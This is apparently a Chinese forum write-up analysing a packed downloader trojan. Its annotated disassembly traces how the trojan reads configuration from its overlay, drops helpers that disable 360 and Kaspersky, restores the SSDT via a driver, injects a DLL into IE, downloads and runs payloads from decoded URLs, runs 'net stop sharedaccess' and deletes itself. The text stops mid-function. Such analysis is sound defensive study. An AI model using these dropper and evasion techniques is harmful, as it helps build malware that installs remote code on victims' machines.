【文章标题】: 一款驱动级下载者的分析
【文章作者】: jackozoo
【下载地址】: 附件
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
前几天在天网Mase上准备找点东西时, 无意间发现了这个小病毒, 于是就有了分析一下的想法.
具体情况: 程序FSG加壳, 有附加数据. 于是脱之, 附加数据追加之, 再使用FixResDemo将资源修复好,这时用任意一款资源查看工具都能清楚的看到其所有资源。
该下载者的自定义资源还真不少.如下:
资源列表:
1: 对付360的弹窗的一个exe.
2: 对付卡巴的一个exe,感觉是利用前段时间卡巴的那个CloseHandle句柄漏洞.
3: 一个dll.用于注射到IE, 执行下载及运行下载文件的功能.
4: 一个驱动文件, 唯一作用就是恢复SSDT.
从反汇编结果看来,这个小病毒是配出来的, 执行流程会有很多处判断, 对于远程地址, 有两种处理方式, 一种是直接作为exe文件的url下载并执行;
另一种方式是作为地址表下载下来,解析出N个地址,然后多线程下载运行.
好了,我不说废话了, 看下主要函数.
////主程序exe分析:
//从WinMain开始看起:
unpacked:00401A9A push ebp
unpacked:00401A9B mov ebp, esp
unpacked:00401A9D sub esp, 704h
unpacked:00401AA3 push ebx
unpacked:00401AA4 push esi
unpacked:00401AA5 push edi
unpacked:00401AA6
unpacked:00401AA6 loc_401AA6: ; DATA XREF: unpacked:0040A0DBo
unpacked:00401AA6 call Read_Overlay ; 读取附加数据, 一些配置信息. 目前一般的木马基本都是通过更新资源的方式
unpacked:00401AA6 ; 来保存配置信息的.附加数据的不多了现在.
unpacked:00401AA6 ;
unpacked:00401AA6 ; 这个下载者会读取很多信息的,我们可以不去看它, 配置信息无非就是木马下
unpacked:00401AA6 ; 载url啊, 还有一些bool变量啊, 什么的. 基本都能猜出来.部分配置信息会
unpacked:00401AA6 ; 控制接下来木马的执行流程.我们把所有的执行都分析一遍就完了.
unpacked:00401AAB test al, al
unpacked:00401AAD jnz short loc_401AB9 //读取成功则跳走。
unpacked:00401AAF
unpacked:00401AAF loc_401AAF: ; CODE XREF: WinMain(x,x,x,x)+26j
unpacked:00401AAF push offset aReadInitFailed ; "Read Init Failed..."
unpacked:00401AB4 jmp loc_401CFA
unpacked:00401AB9 ; ---------------------------------------------------------------------------
unpacked:00401AB9
unpacked:00401AB9 loc_401AB9: ; CODE XREF: WinMain(x,x,x,x)+13j
unpacked:00401AB9 call Read_Overlay ; 这里又读了一次自身, 完全是多余的,看来作者的编码很粗糙。
unpacked:00401ABE test al, al
unpacked:00401AC0 jz short loc_401AAF
unpacked:00401AC2 push 5
unpacked:00401AC4 mov esi, offset aCWindowsSm360_ ; "c:\\windows\\sm360.exe" //释放路径,奇怪作者为什么不将这个加密下。
unpacked:00401AC9 pop ecx
unpacked:00401ACA lea edi, [ebp+release_path]
unpacked:00401ACD rep movsd
unpacked:00401ACF push 5
unpacked:00401AD1 lea eax, [ebp+release_path]
unpacked:00401AD4 movsb
unpacked:00401AD5 pop ecx
unpacked:00401AD6 mov esi, offset aCWindowsKavp_e ; "c:\\windows\\kavp.exe" //释放路径。
unpacked:00401ADB lea edi, [ebp+releasePath]
unpacked:00401ADE push eax ; releasePath
unpacked:00401ADF push offset resType ; "CL360"
unpacked:00401AE4 push 88h ; resourceId
unpacked:00401AE9 rep movsd
unpacked:00401AEB call ReleaseResource ; //一个释放资源的函数。
unpacked:00401AF0 lea eax, [ebp+releasePath]
unpacked:00401AF3 push eax ; releasePath
unpacked:00401AF4 push offset aKavp ; "KAVP"
unpacked:00401AF9 push 89h ; resourceId
unpacked:00401AFE call ReleaseResource ;
unpacked:00401B03 mov esi, WinExec
unpacked:00401B09 add esp, 18h
unpacked:00401B0C xor ebx, ebx
unpacked:00401B0E lea eax, [ebp+release_path]
unpacked:00401B11 push ebx ; uCmdShow
unpacked:00401B12 push eax ; lpCmdLine
unpacked:00401B13 call esi ; WinExec ; 执行释放后的sm360.exe文件。 (我后来分析了下这个,是关360弹窗的.)
unpacked:00401B15 lea eax, [ebp+releasePath]
unpacked:00401B18 push ebx ; uCmdShow
unpacked:00401B19 push eax ; lpCmdLine
unpacked:00401B1A call esi ; WinExec ; 执行释放后的kavp.exe文件,卡巴.
unpacked:00401B1C cmp byte_404A0B, bl ; jumptable 004096E0 case 1
unpacked:00401B22 jz short loc_401B3B //上面的byte_404A0B是从配置信息中读出来的,作为一个bool变量使用。
unpacked:00401B24 push [ebp+lpAddress] ; hModule
unpacked:00401B27 call Start_ReSSDT ; 开始恢复SSDT. //开始动刀了。
unpacked:00401B2C test al, al
unpacked:00401B2E pop ecx
unpacked:00401B2F jnz short loc_401B3B
unpacked:00401B31 push offset aRestoreSsdtFai ; "Restore SSDT failed ." //作者用OutputDebugString输出了很多信息,极大地方便了我们的分析。
unpacked:00401B36 jmp loc_401CFA
unpacked:00401B3B ; ---------------------------------------------------------------------------
unpacked:00401B3B
unpacked:00401B3B loc_401B3B: ; CODE XREF: WinMain(x,x,x,x)+88j //这里是通过比较配置信息,即最上面那个bool变量来控制是否执行到这里。
unpacked:00401B3B ; WinMain(x,x,x,x)+95j //最后我发现,上面的byte_404A0B其实是控制是否注射IE。为0则直接执行下载活动,为1则通过注射IE在IE进程中干坏事,因为一般防火墙不拦截IE。
unpacked:00401B3B cmp byte_404A10, bl //这里的byte_404A10也是一bool信息,控制下载模式是“直接exe地址”模式还是“地址表中转”模式。
unpacked:00401B41 jz loc_401CBF
unpacked:00401B47 lea eax, [ebp+selfPath]
unpacked:00401B4D push 104h ; nSize
unpacked:00401B52 push eax ; lpFilename
unpacked:00401B53 push ebx ; hModule
unpacked:00401B54 call GetModuleFileNameA ; 得到自身路径.
unpacked:00401B5A test eax, eax
unpacked:00401B5C jnz short loc_401B68
unpacked:00401B5E push offset aGetmodulefilen ; "GetmoduleFileNameA failed.."
unpacked:00401B63 jmp loc_401CFA
unpacked:00401B68 ; ---------------------------------------------------------------------------
unpacked:00401B68
unpacked:00401B68 loc_401B68: ; CODE XREF: WinMain(x,x,x,x)+C2j
unpacked:00401B68 lea eax, [ebp+selfPath]
unpacked:00401B6E push offset aRb ; "rb"
unpacked:00401B73 push eax ; Filename
unpacked:00401B74 call fopen ; 打开自己, 读取附加数据.
unpacked:00401B7A mov edi, eax
unpacked:00401B7C pop ecx
unpacked:00401B7D cmp edi, ebx
unpacked:00401B7F pop ecx
unpacked:00401B80 jnz short loc_401B8C
unpacked:00401B82 push offset aCanNotOpenFile ; "can not open file , fopen..."
unpacked:00401B87 jmp loc_401CFA
unpacked:00401B8C ; ---------------------------------------------------------------------------
unpacked:00401B8C
unpacked:00401B8C loc_401B8C: ; CODE XREF: WinMain(x,x,x,x)+E6j
unpacked:00401B8C mov esi, fseek
unpacked:00401B92 push 2 ; Origin //这个代表从文件末尾开始定位。
unpacked:00401B94 push 0FFFFFF30h ; Offset //
unpacked:00401B99 push edi ; File
unpacked:00401B9A call esi ; fseek ; 开始定位读取光标.
unpacked:00401B9C push edi ; File
unpacked:00401B9D push 1 ; Count
unpacked:00401B9F lea eax, [ebp+DstBuf]
unpacked:00401BA5 push 6Ah ; ElementSize
unpacked:00401BA7 push eax ; DstBuf
unpacked:00401BA8 call fread //将附加数据读到缓冲区中。
unpacked:00401BAE push edi ; File
unpacked:00401BAF mov edi, fclose
unpacked:00401BB5 call edi ; fclose
unpacked:00401BB7 add esp, 20h
unpacked:00401BBA lea eax, [ebp+hModule]
unpacked:00401BC0 push 104h ; uSize
unpacked:00401BC5 push eax ; lpBuffer
unpacked:00401BC6 call GetWindowsDirectoryA //得到系统目录,准备释放dll。
unpacked:00401BCC lea eax, [ebp+hModule]
unpacked:00401BD2 push offset aSystem32Ilovex ; "\\system32\\ilovexd.dll"
unpacked:00401BD7 push eax
unpacked:00401BD8 call _mbscat ; 连接成一个路径 c:\Windows\system32\ilovexd.dll 作为释放路径.
unpacked:00401BDD lea eax, [ebp+hModule]
unpacked:00401BE3 push eax ; releasePath
unpacked:00401BE4 push offset aMydll ; "MYDLL"
unpacked:00401BE9 push 85h ; resourceId
unpacked:00401BEE call ReleaseResource ; 释放一个dll.
unpacked:00401BF3 add esp, 14h
unpacked:00401BF6 test al, al
unpacked:00401BF8 jnz short loc_401C04
unpacked:00401BFA push offset aReleaseDllFail ; "release dll failed ..."
unpacked:00401BFF jmp loc_401CFA
unpacked:00401C04 ; ---------------------------------------------------------------------------
unpacked:00401C04
unpacked:00401C04 loc_401C04: ; CODE XREF: WinMain(x,x,x,x)+15Ej
unpacked:00401C04 lea eax, [ebp+hModule]
unpacked:00401C0A push offset aRb_0 ; "rb+"
unpacked:00401C0F push eax ; Filename
unpacked:00401C10 call fopen //打开刚才释放的dll。
unpacked:00401C16 push 2 ; Origin
unpacked:00401C18 push 0FFFFFF80h ; Offset
unpacked:00401C1A push eax ; File
unpacked:00401C1B mov [ebp+lpAddress], eax
unpacked:00401C1E call esi ; fseek
unpacked:00401C20 push [ebp+lpAddress] ; File
unpacked:00401C23 lea eax, [ebp+DstBuf]
unpacked:00401C29 push 1 ; Count
unpacked:00401C2B push 6Ah ; Size
unpacked:00401C2D push eax ; Str
unpacked:00401C2E call fwrite //将刚才读取的附加数据写到dll的末尾、达到传递配置信息的目的。
unpacked:00401C34 push [ebp+lpAddress] ; File
unpacked:00401C37 call edi ; fclose
unpacked:00401C39 mov esi, offset Str1 //这里也是一个配置信息,用于配置注射的进程名。
unpacked:00401C3E push esi
unpacked:00401C3F call GetIdByProName ; //调用从进程名得到进程ID的一个函数。
unpacked:00401C44 mov edi, _itoa
unpacked:00401C4A lea ecx, [ebp+var_18]
unpacked:00401C4D push 0Ah ; Radix
unpacked:00401C4F push ecx ; DstBuf
unpacked:00401C50 push eax ; Val
unpacked:00401C51 mov [ebp+lpAddress], eax
unpacked:00401C54 call edi ; _itoa
unpacked:00401C56 add esp, 38h
unpacked:00401C59 cmp [ebp+lpAddress], ebx
unpacked:00401C5C jnz short loc_401C98
unpacked:00401C5E push offset File ; "IEXPLORE.EXE"
unpacked:00401C63 push esi ; Str1
unpacked:00401C64 call strcmp ; 比较是否是"IEXPLORE.EXE"字符串
unpacked:00401C69 pop ecx
unpacked:00401C6A test eax, eax ; 不相等就跳走.
unpacked:00401C6C pop ecx
unpacked:00401C6D jnz short loc_401C98
unpacked:00401C6F push ebx ; nShowCmd
unpacked:00401C70 push ebx ; lpDirectory
unpacked:00401C71 push ebx ; lpParameters
unpacked:00401C72 push offset File ; "IEXPLORE.EXE"
unpacked:00401C77 push offset Operation ; "open"
unpacked:00401C7C push ebx ; hwnd
unpacked:00401C7D call ShellExecuteA ; 这里创建一个IE进程.猜都可以猜到要注入进去.
unpacked:00401C83 push esi ; 那这里就是"IEXPLORE.EXE"
unpacked:00401C84 call GetIdByProName ; 得到其进程ID
unpacked:00401C89 lea ecx, [ebp+var_18]
unpacked:00401C8C push 0Ah ; Radix
unpacked:00401C8E push ecx ; DstBuf
unpacked:00401C8F push eax ; Val
unpacked:00401C90 mov [ebp+lpAddress], eax
unpacked:00401C93 call edi ; _itoa
unpacked:00401C95 add esp, 10h
unpacked:00401C98
unpacked:00401C98 loc_401C98: ; CODE XREF: WinMain(x,x,x,x)+1C2j
unpacked:00401C98 ; WinMain(x,x,x,x)+1D3j
unpacked:00401C98 push [ebp+lpAddress] ; TargetProcessId
unpacked:00401C9B lea eax, [ebp+hModule]
unpacked:00401CA1 push eax ; szDllPath
unpacked:00401CA2 call InjectDll ; 注如代码至IE进程.作者使用的是CreateRemoteThread这种最简单的方法.
unpacked:00401CA7 cmp byte_404A09, bl ; bool标志位, 决定是否自删除.
unpacked:00401CAD pop ecx
unpacked:00401CAE pop ecx
unpacked:00401CAF jz loc_401ECD
unpacked:00401CB5 call DelSelf ; 自删除掉, 从这看出注入IE进程的话, 下面的动作都不会执行的.
unpacked:00401CB5 ; 如果不注入IE, 下面得才会执行.
unpacked:00401CB5 ;
unpacked:00401CB5 ; 在这个exe后, 我再单独分析一下那个dll.
unpacked:00401CBA jmp loc_401ECD
unpacked:00401CBF ; ---------------------------------------------------------------------------
unpacked:00401CBF
unpacked:00401CBF loc_401CBF: ; CODE XREF: WinMain(x,x,x,x)+A7j
unpacked:00401CBF cmp byte_404A08, bl
unpacked:00401CC5 jz loc_401E7F
unpacked:00401CCB mov edi, offset byte_4049A4
unpacked:00401CD0 push 63h
unpacked:00401CD2 push edi
unpacked:00401CD3 call DecodeURL ; 对URL异或解密
unpacked:00401CD8 pop ecx
unpacked:00401CD9 mov esi, offset aCProgra1Url_tx ; "C:\\Progra~1\\url.txt"
unpacked:00401CDE pop ecx
unpacked:00401CDF push ebx ; LPBINDSTATUSCALLBACK
unpacked:00401CE0 push ebx ; DWORD
unpacked:00401CE1 push esi ; LPCSTR
unpacked:00401CE2 push edi ; LPCSTR
unpacked:00401CE3 push ebx ; LPUNKNOWN
unpacked:00401CE4 call URLDownloadToFileA ; 在这里下载的就不是exe,而是一个url表.里面估计都是地址.
unpacked:00401CE9 push esi ; lpFileName
unpacked:00401CEA call GetFileAttributesA ; 作者竟使用这个函数来判断文件是否存在.
unpacked:00401CF0 cmp eax, 0FFFFFFFFh
unpacked:00401CF3 jnz short loc_401D07
unpacked:00401CF5 push offset aDown_exeInvali ; "down.exe:invalid url or empty page, ple"...
unpacked:00401CFA
unpacked:00401CFA loc_401CFA: ; CODE XREF: WinMain(x,x,x,x)+1Aj
unpacked:00401CFA ; WinMain(x,x,x,x)+9Cj
unpacked:00401CFA ; WinMain(x,x,x,x)+C9j
unpacked:00401CFA ; WinMain(x,x,x,x)+EDj
unpacked:00401CFA ; WinMain(x,x,x,x)+165j
unpacked:00401CFA call OutputDebugStringA
unpacked:00401D00 xor eax, eax
unpacked:00401D02 jmp loc_401ED0
unpacked:00401D07 ; ---------------------------------------------------------------------------
unpacked:00401D07
unpacked:00401D07 loc_401D07: ; CODE XREF: WinMain(x,x,x,x)+259j
unpacked:00401D07 push 18h
unpacked:00401D09 xor eax, eax
unpacked:00401D0B pop ecx
unpacked:00401D0C lea edi, [ebp+var_113]
unpacked:00401D12 mov [ebp+var_114], bl
unpacked:00401D18 push offset aR ; "r+"
unpacked:00401D1D rep stosd
unpacked:00401D1F stosw
unpacked:00401D21 push esi ; Filename
unpacked:00401D22 mov [ebp+lpAddress], ebx
unpacked:00401D25 mov [ebp+var_8], 3E8h
unpacked:00401D2C stosb
unpacked:00401D2D call fopen ; 打开刚才的url.txt
unpacked:00401D33 pop ecx
unpacked:00401D34 cmp eax, ebx
unpacked:00401D36 pop ecx
unpacked:00401D37 mov [ebp+var_C], eax
unpacked:00401D3A jz loc_401DE7
unpacked:00401D40 mov ecx, 0F9h
unpacked:00401D45 xor eax, eax
unpacked:00401D47 lea edi, [ebp+var_703]
unpacked:00401D4D mov [ebp+urlTable], bl
unpacked:00401D53 rep stosd
unpacked:00401D55 push [ebp+var_C] ; File
unpacked:00401D58 stosw
unpacked:00401D5A stosb
unpacked:00401D5B push 1 ; Count
unpacked:00401D5D lea eax, [ebp+urlTable]
unpacked:00401D63 push 3E8h ; ElementSize
unpacked:00401D68 push eax ; DstBuf
unpacked:00401D69 call fread ; 一次性把数据读完.
unpacked:00401D6F add esp, 10h
unpacked:00401D72 mov [ebp+var_4], offset byte_404B98
unpacked:00401D79
unpacked:00401D79 loc_401D79: ; CODE XREF: WinMain(x,x,x,x)+33Aj
unpacked:00401D79 mov edi, [ebp+lpAddress]
unpacked:00401D7C cmp [ebp+edi+urlTable], 0Ah
unpacked:00401D84 jnz short loc_401DCB
unpacked:00401D86 inc edi
unpacked:00401D87 lea eax, [ebp+urlTable]
unpacked:00401D8D push edi
unpacked:00401D8E push eax
unpacked:00401D8F lea eax, [ebp+var_114]
unpacked:00401D95 push eax
unpacked:00401D96 call lstrcpyn ; 显然.这个循环在将读出的数据分析后的url写到数组中.
unpacked:00401D9C lea eax, [ebp+var_114]
unpacked:00401DA2 push eax
unpacked:00401DA3 push [ebp+var_4]
unpacked:00401DA6 call _mbscpy
unpacked:00401DAB lea eax, [ebp+urlTable]
unpacked:00401DB1 push edi
unpacked:00401DB2 push eax
unpacked:00401DB3 call GetLeft ; 得到一字符串的左边特定字节. 这个call我是在OD中跟出来的.
unpacked:00401DB8 or eax, 0FFFFFFFFh
unpacked:00401DBB add esp, 10h
unpacked:00401DBE sub eax, [ebp+lpAddress]
unpacked:00401DC1 mov [ebp+lpAddress], ebx
unpacked:00401DC4 add [ebp+var_8], eax
unpacked:00401DC7 add [ebp+var_4], 64h
unpacked:00401DCB
unpacked:00401DCB loc_401DCB: ; CODE XREF: WinMain(x,x,x,x)+2EAj
unpacked:00401DCB inc [ebp+lpAddress]
unpacked:00401DCE mov eax, [ebp+lpAddress]
unpacked:00401DD1 cmp eax, [ebp+var_8]
unpacked:00401DD4 jl short loc_401D79
unpacked:00401DD6 push [ebp+var_C] ; File
unpacked:00401DD9 call fclose
unpacked:00401DDF pop ecx
unpacked:00401DE0 push esi ; lpFileName
unpacked:00401DE1 call DeleteFileA ; 删除url.txt
unpacked:00401DE7
unpacked:00401DE7 loc_401DE7: ; CODE XREF: WinMain(x,x,x,x)+2A0j
unpacked:00401DE7 push 13h
unpacked:00401DE9 xor eax, eax
unpacked:00401DEB pop ecx
unpacked:00401DEC lea edi, [ebp+var_94]
unpacked:00401DF2 mov [ebp+var_98], ebx
unpacked:00401DF8 lea esi, [ebp+var_98]
unpacked:00401DFE rep stosd
unpacked:00401E00 mov edi, offset byte_404B98
unpacked:00401E05
unpacked:00401E05 loc_401E05: ; CODE XREF: WinMain(x,x,x,x)+3ADj
unpacked:00401E05 push offset Str2 ; Str2
unpacked:00401E0A push edi ; Str1
unpacked:00401E0B call strcmp ; 这里又判断了一遍IE, 貌似又是多余的.
unpacked:00401E10 pop ecx
unpacked:00401E11 test eax, eax
unpacked:00401E13 pop ecx
unpacked:00401E14 jz short loc_401E3B
unpacked:00401E16 push ebx ; lpThreadId
unpacked:00401E17 push ebx ; dwCreationFlags
unpacked:00401E18 push edi ; lpParameter
unpacked:00401E19 push offset ThreadProc ; lpStartAddress
unpacked:00401E1E push ebx ; dwStackSize
unpacked:00401E1F push ebx ; lpThreadAttributes
unpacked:00401E20 call CreateThread ; 创建多个线程,加快速度, 其中从地址表中的每个url分别作为参数传到线程函数中.
unpacked:00401E26 push offset asc_4044C0 ; "----------"
unpacked:00401E2B mov [esi], eax
unpacked:00401E2D call OutputDebugStringA
unpacked:00401E33 push 63h ; dwMilliseconds
unpacked:00401E35 call Sleep ; 估计是为了避免用户CPU突增, 休眠一段时间.
unpacked:00401E3B
unpacked:00401E3B loc_401E3B: ; CODE XREF: WinMain(x,x,x,x)+37Aj
unpacked:00401E3B add edi, 64h
unpacked:00401E3E add esi, 4
unpacked:00401E41 cmp edi, offset dword_405368
unpacked:00401E47 jl short loc_401E05
unpacked:00401E49 lea edi, [ebp+var_98]
unpacked:00401E4F mov [ebp+lpAddress], 14h
unpacked:00401E56
unpacked:00401E56 loc_401E56: ; CODE XREF: WinMain(x,x,x,x)+3E3j
unpacked:00401E56 mov esi, [edi]
unpacked:00401E58 cmp esi, ebx
unpacked:00401E5A jz short loc_401E77
unpacked:00401E5C push 0FFFFFFFFh ; dwMilliseconds
unpacked:00401E5E push esi ; hHandle
unpacked:00401E5F call WaitForSingleObject ; 等各个线程执行完毕.
unpacked:00401E65 push esi ; hObject
unpacked:00401E66 call __imp_CloseHandle ; 任务完成.
unpacked:00401E6C push offset asc_4044B4 ; "==========="
unpacked:00401E71 call OutputDebugStringA
unpacked:00401E77
unpacked:00401E77 loc_401E77: ; CODE XREF: WinMain(x,x,x,x)+3C0j
unpacked:00401E77 add edi, 4
unpacked:00401E7A dec [ebp+lpAddress]
unpacked:00401E7D jnz short loc_401E56
unpacked:00401E7F
unpacked:00401E7F loc_401E7F: ; CODE XREF: WinMain(x,x,x,x)+22Bj
unpacked:00401E7F mov esi, OutputDebugStringA
unpacked:00401E85 push offset aWebgetOver_ ; "webget over ."
unpacked:00401E8A call esi ; OutputDebugStringA
unpacked:00401E8C cmp byte_404A0A, bl
unpacked:00401E92 jz short loc_401EA0
unpacked:00401E94 push ebx ; uCmdShow
unpacked:00401E95 push offset CmdLine ; "net stop sharedaccess"
unpacked:00401E9A call WinExec ; 关防火墙的命令.
unpacked:00401EA0
unpacked:00401EA0 loc_401EA0: ; CODE XREF: WinMain(x,x,x,x)+3F8j
unpacked:00401EA0 push offset aStopSharedacce ; "stop sharedaccess over ."
unpacked:00401EA5 call esi ; OutputDebugStringA
unpacked:00401EA7 cmp byte_404A09, bl
unpacked:00401EAD jz short loc_401EB4
unpacked:00401EAF call DelSelf ; 自删除, 可以看到, 程序有很多分支, 主要是因为配置的不同导致不同的执行方式.
unpacked:00401EB4
unpacked:00401EB4 loc_401EB4: ; CODE XREF: WinMain(x,x,x,x)+413j
unpacked:00401EB4 push offset aDelMeOver_ ; "Del me over ."
unpacked:00401EB9 call esi ; OutputDebugStringA
unpacked:00401EBB push 1388h ; dwMilliseconds
unpacked:00401EC0 call Sleep
unpacked:00401EC6 push offset aBeginReturn___ ; "begin return ..."
unpacked:00401ECB call esi ; OutputDebugStringA
unpacked:00401ECD
unpacked:00401ECD loc_401ECD: ; CODE XREF: WinMain(x,x,x,x)+215j
unpacked:00401ECD ; WinMain(x,x,x,x)+220j
unpacked:00401ECD push 1
unpacked:00401ECF pop eax
unpacked:00401ED0
unpacked:00401ED0 loc_401ED0: ; CODE XREF: WinMain(x,x,x,x)+268j
unpacked:00401ED0 pop edi
unpacked:00401ED1 pop esi
unpacked:00401ED2 pop ebx
unpacked:00401ED3 leave
unpacked:00401ED4 retn 10h
unpacked:00401ED4 _WinMain@16 endp
unpacked:00401ED4
unpacked:00401ED7
//读取附加数据call (即配置信息了,主要为URl,和一些bool型的控制变量)
unpacked:00402114 push ebp
unpacked:00402115 mov ebp, esp
unpacked:00402117 sub esp, 170h
unpacked:0040211D and [ebp+Filename], 0
unpacked:00402124 push ebx
unpacked:00402125 push esi
unpacked:00402126 push edi
unpacked:00402127 push 3Fh
unpacked:00402129 xor eax, eax
unpacked:0040212B pop ecx
unpacked:0040212C lea edi, [ebp+var_16F]
unpacked:00402132 rep stosd
unpacked:00402134 stosw
unpacked:00402136 lea eax, [ebp+Filename]
unpacked:0040213C push 0FFh ; nSize
unpacked:00402141 push eax ; lpFilename
unpacked:00402142 push 0 ; hModule
unpacked:00402144 call GetModuleFileNameA ; 得到自身文件路径.
unpacked:0040214A test eax, eax
unpacked:0040214C ja short loc_402158
unpacked:0040214E push offset aGetModulefileN ; "Get modulefile name failed...."
unpacked:00402153 jmp loc_402384
unpacked:00402158 ; ---------------------------------------------------------------------------
unpacked:00402158
unpacked:00402158 loc_402158: ; CODE XREF: Read_Overlay+38j
unpacked:00402158 lea eax, [ebp+Filename]
unpacked:0040215E push offset aRb ; "rb"
unpacked:00402163 push eax ; Filename
unpacked:00402164 call fopen ; 以二进制模式打开
unpacked:0040216A mov ebx, eax
unpacked:0040216C pop ecx
unpacked:0040216D test ebx, ebx
unpacked:0040216F pop ecx
unpacked:00402170 jnz short loc_40217C
unpacked:00402172 push offset aCanOpenMyself_ ; "can open myself...."
unpacked:00402177 jmp loc_402384
unpacked:0040217C ; ---------------------------------------------------------------------------
unpacked:0040217C
unpacked:0040217C loc_40217C: ; CODE XREF: Read_Overlay+5Cj
unpacked:0040217C and [ebp+DstBuf], 0
unpacked:00402180 mov esi, fseek
unpacked:00402186 push 1Bh
unpacked:00402188 xor eax, eax
unpacked:0040218A pop ecx
unpacked:0040218B lea edi, [ebp+var_6F]
unpacked:0040218E push 2 ; Origin
unpacked:00402190 push 0FFFFFF30h ; Offset
unpacked:00402195 rep stosd
unpacked:00402197 push ebx ; File
unpacked:00402198 call esi ; fseek ; 定位至特定位置.
unpacked:0040219A mov edi, fread
unpacked:004021A0 push ebx ; File
unpacked:004021A1 push 1 ; Count
unpacked:004021A3 lea eax, [ebp+DstBuf]
unpacked:004021A6 push 1 ; ElementSize
unpacked:004021A8 push eax ; DstBuf
unpacked:004021A9 call edi ; fread ; 下面全部都是一些配置信息的读取了, 就不做过多的解释,我们分析一下它主要干什么事就可以了。
unpacked:004021AB add esp, 1Ch
unpacked:004021AE test eax, eax
unpacked:004021B0 jnz short loc_4021BC
unpacked:004021B2 push offset aFopenCannTRead ; "fopen cann't read data.. /isinject "
unpacked:004021B7 jmp loc_402384
unpacked:004021BC ; ---------------------------------------------------------------------------
unpacked:004021BC
unpacked:004021BC loc_4021BC: ; CODE XREF: Read_Overlay+9Cj
unpacked:004021BC cmp [ebp+DstBuf], 59h
unpacked:004021C0 push 6Dh ; Size
unpacked:004021C2 push 0 ; Val
unpacked:004021C4 setz al
unpacked:004021C7 mov byte_404A10, al
unpacked:004021CC lea eax, [ebp+DstBuf]
unpacked:004021CF push eax ; Dst
unpacked:004021D0 call memset
unpacked:004021D5 push 2 ; Origin
unpacked:004021D7 push 0FFFFFF31h ; Offset
unpacked:004021DC push ebx ; File
unpacked:004021DD call esi ; fseek
unpacked:004021DF push ebx ; File
unpacked:004021E0 push 1 ; Count
unpacked:004021E2 lea eax, [ebp+DstBuf]
unpacked:004021E5 push 1 ; ElementSize
unpacked:004021E7 push eax ; DstBuf
unpacked:004021E8 call edi ; fread
unpacked:004021EA add esp, 28h
unpacked:004021ED cmp byte_404A10, 0
unpacked:004021F4 jz short loc_402203
unpacked:004021F6 cmp [ebp+DstBuf], 49h
unpacked:004021FA jnz short loc_40221A
unpacked:004021FC and dword_404A0C, 0
unpacked:00402203
unpacked:00402203 loc_402203: ; CODE XREF: Read_Overlay+E0j
unpacked:00402203 ; Read_Overlay+116j
unpacked:00402203 ; Read_Overlay+128j
unpacked:00402203 mov eax, dword_404A0C
unpacked:00402208 sub eax, 0
unpacked:0040220B jz short loc_40224F
unpacked:0040220D dec eax
unpacked:0040220E jz short loc_402248
unpacked:00402210 dec eax
unpacked:00402211 jnz short loc_402260
unpacked:00402213 push offset aExplorer_exe ; "explorer.exe"
unpacked:00402218 jmp short loc_402254
unpacked:0040221A ; ---------------------------------------------------------------------------
unpacked:0040221A
unpacked:0040221A loc_40221A: ; CODE XREF: Read_Overlay+E6j
unpacked:0040221A cmp [ebp+DstBuf], 53h
unpacked:0040221E jnz short loc_40222C
unpacked:00402220 mov dword_404A0C, 1
unpacked:0040222A jmp short loc_402203
unpacked:0040222C ; ---------------------------------------------------------------------------
unpacked:0040222C
unpacked:0040222C loc_40222C: ; CODE XREF: Read_Overlay+10Aj
unpacked:0040222C cmp [ebp+DstBuf], 45h
unpacked:00402230 jnz short loc_40223E
unpacked:00402232 mov dword_404A0C, 2
unpacked:0040223C jmp short loc_402203
unpacked:0040223E ; ---------------------------------------------------------------------------
unpacked:0040223E
unpacked:0040223E loc_40223E: ; CODE XREF: Read_Overlay+11Cj
unpacked:0040223E push offset aISEElse____ ; "I S E , else ...."
unpacked:00402243 jmp loc_402384
unpacked:00402248 ; ---------------------------------------------------------------------------
unpacked:00402248
unpacked:00402248 loc_402248: ; CODE XREF: Read_Overlay+FAj
unpacked:00402248 push offset aSvchost_exe ; "svchost.exe"
unpacked:0040224D jmp short loc_402254
unpacked:0040224F ; ---------------------------------------------------------------------------
unpacked:0040224F
unpacked:0040224F loc_40224F: ; CODE XREF: Read_Overlay+F7j
unpacked:0040224F push offset File ; "IEXPLORE.EXE"
unpacked:00402254
unpacked:00402254 loc_402254: ; CODE XREF: Read_Overlay+104j
unpacked:00402254 ; Read_Overlay+139j
unpacked:00402254 push offset Str1
unpacked:00402259 call _mbscpy
unpacked:0040225E pop ecx
unpacked:0040225F pop ecx
unpacked:00402260
unpacked:00402260 loc_402260: ; CODE XREF: Read_Overlay+FDj
unpacked:00402260 push 6Dh ; Size
unpacked:00402262 lea eax, [ebp+DstBuf]
unpacked:00402265 push 0 ; Val
unpacked:00402267 push eax ; Dst
unpacked:00402268 call memset
unpacked:0040226D push 2 ; Origin
unpacked:0040226F push 0FFFFFF32h ; Offset
unpacked:00402274 push ebx ; File
unpacked:00402275 call esi ; fseek
unpacked:00402277 push ebx ; File
unpacked:00402278 push 1 ; Count
unpacked:0040227A lea eax, [ebp+DstBuf]
unpacked:0040227D push 1 ; ElementSize
unpacked:0040227F push eax ; DstBuf
unpacked:00402280 call edi ; fread
unpacked:00402282 add esp, 28h
unpacked:00402285 test eax, eax
unpacked:00402287 jnz short loc_402293
unpacked:00402289 push offset aFopenCannTRe_0 ; "fopen cann't read data.. /isReSSDT "
unpacked:0040228E jmp loc_402384
unpacked:00402293 ; ---------------------------------------------------------------------------
unpacked:00402293
unpacked:00402293 loc_402293: ; CODE XREF: Read_Overlay+173j
unpacked:00402293 cmp [ebp+DstBuf], 59h
unpacked:00402297 push 6Dh ; Size
unpacked:00402299 push 0 ; Val
unpacked:0040229B
unpacked:0040229B loc_40229B: ; DATA XREF: sub_409563+17Dr
unpacked:0040229B setz al ; jump table for switch statement
unpacked:0040229E mov byte_404A0B, al ; jumptable 004096E0 case 1
unpacked:004022A3 lea eax, [ebp+DstBuf]
unpacked:004022A6 push eax ; Dst
unpacked:004022A7 call memset
unpacked:004022AC push 2 ; Origin
unpacked:004022AE push 0FFFFFF33h ; Offset
unpacked:004022B3 push ebx ; File
unpacked:004022B4 call esi ; fseek
unpacked:004022B6 push ebx ; File
unpacked:004022B7 push 1 ; Count
unpacked:004022B9 lea eax, [ebp+DstBuf]
unpacked:004022BC push 1 ; ElementSize
unpacked:004022BE push eax ; DstBuf
unpacked:004022BF call edi ; fread
unpacked:004022C1 add esp, 28h
unpacked:004022C4 test eax, eax
unpacked:004022C6 jnz short loc_4022D2
unpacked:004022C8 push offset aFopenCannTRe_1 ; "fopen cann't read data.. /isStopShare.."...
